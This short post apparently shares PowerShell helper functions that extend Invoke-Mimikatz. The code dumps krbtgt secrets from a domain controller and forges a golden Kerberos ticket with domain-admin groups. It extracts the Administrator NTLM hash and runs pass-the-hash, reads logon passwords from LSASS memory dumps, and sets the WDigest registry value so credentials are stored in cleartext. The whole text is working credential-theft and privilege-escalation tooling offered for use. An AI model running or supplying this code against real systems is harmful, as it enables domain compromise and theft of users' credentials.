one of the main security issues with windows is pass the hash. I added some functions to the Mimikatz Powershell script that can be found here.
The functions that make the usage of mimikatz more easy. Just add these functions to the end of the mimikatz script and launch the script. Then the functions are in memory and available functions will be shown.
Function Global:invoke-mimiDom {
if (Test-path „$ScriptPath\mimi_dom.log“) {
$MimiUser =“didi44″
write-host $scriptpath -foregroundcolor green
$global:mimidata = Get-Content „$ScriptPath\mimi_dom.log“
Foreach ($line in $mimidata){
if ($line -match „aes256_hmac“) {$global:aes = $($line.split(„:“)[1]).trim()}
if ($line -match „Domain :“) {$global:domSid = $($line.split(„/“)[1]).trim()}
if ($line -match „Default Salt :“) {$global:domain = $($($line.split(„:“)[1]).trim()).replace(„krbtgt“,““)}
}
$FullCMD= „kerberos::golden /domain:“ + $domain + “ /sid:“ + $domsid + “ /aes256:“ + $aes + “ /user:“ + $mimiUser + “ /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi“
Write-host $fullcmd
invoke-mimikatz -command „privilege::debug kerberos::purge `“$fullcmd`“ `“kerberos::ptt forged.kirbi`“ misc::cmd“
} ELSE {
Write-host „there is no mimi_dom.log, please run first invoke-mimiexportdom on a domain controller“ -foregroundcolor red
}
}
Function Global:invoke-mimiStd {
$global:mimi_tmp = Invoke-Mimikatz
$mimi_TMP | Out-File „$ScriptPath\mimi.log“
$global:mimi = Get-Content „$ScriptPath\mimi.log“
foreach ($line in $mimi){
$number++
if ($line -match „\* Username : Administrator“){
$Global:mimiUsername1 = $($line.split(„:“)[1]).trim()
$Global:mimiDom1 = $($mimi[$number].split(„:“)[1]).trim()
$Global:mimiHash1 = $($mimi[$number+1].split(„:“)[1]).trim()
break
}
}
Write-host „$mimiusername1 $mimiDom1 $mimihash1“
}
FUNCTION Global:invoke-MimiExportDom {
if (!(test-path „$scriptpath\mimi_dom.log“)){
$global:mimi_dom_tmp = Invoke-mimikatz -command „privilege::debug `“lsadump::lsa /inject /name:krbtgt`““
$global:mimi_dom_tmp | Out-File „$scriptpath\mimi_dom.log“
$global:mimi_dom = get-content „$ScriptPath\mimi_dom.log“
}
}
FUNCTION Global:Invoke-mimiDMP {
$dmps = get-childitem „$scriptpath\*.dmp“
foreach ($dmp in $dmps) {
Write-host „analysing $dmp“ -foregroundcolor green
$global:mimi = invoke-mimikatz -command „privilege::debug `“sekurlsa::minidump $dmp`“ sekurlsa::logonpasswords“
}
Write-host $mimi
}
FUNCTION Global:Invoke-mimicmd {
If ($mimiUsername1 -lt 1){
Write-host „please run first invoke-mimiSTD“ -foregroundcolor red}
ELSE {
$command = „privilege::debug `“sekurlsa::pth /user:“ + $mimiUsername1 + “ /domain:“+ $mimiDom1 + “ /ntlm:“ + $mimiHash1 +“ /run:cmd`““
write-host „$command“
$global:mimi = invoke-mimikatz -command $command
}
}
#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
If ($( get-itemproperty HKLM:\system\CurrentControlSet\Control\SecurityProviders\WDigest\).uselogoncredential -ne 1){
reg add HKLM\system\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t Reg_DWORD /d 1
Write-host „changed security provider – to see passeword in cleartext logoff and log on again“ -ForegroundColor Yellow
}
Write-host „the following functions are available:“
write-host „invoke-mimiStd“ -foregroundcolor green
write-host „invoke-mimiExportDom“ -foregroundcolor green
write-host „invoke-mimiDom“ -foregroundcolor green
write-host „invoke-mimiDmp“ -foregroundcolor green
write-host „invoke-mimiCMD“ -foregroundcolor green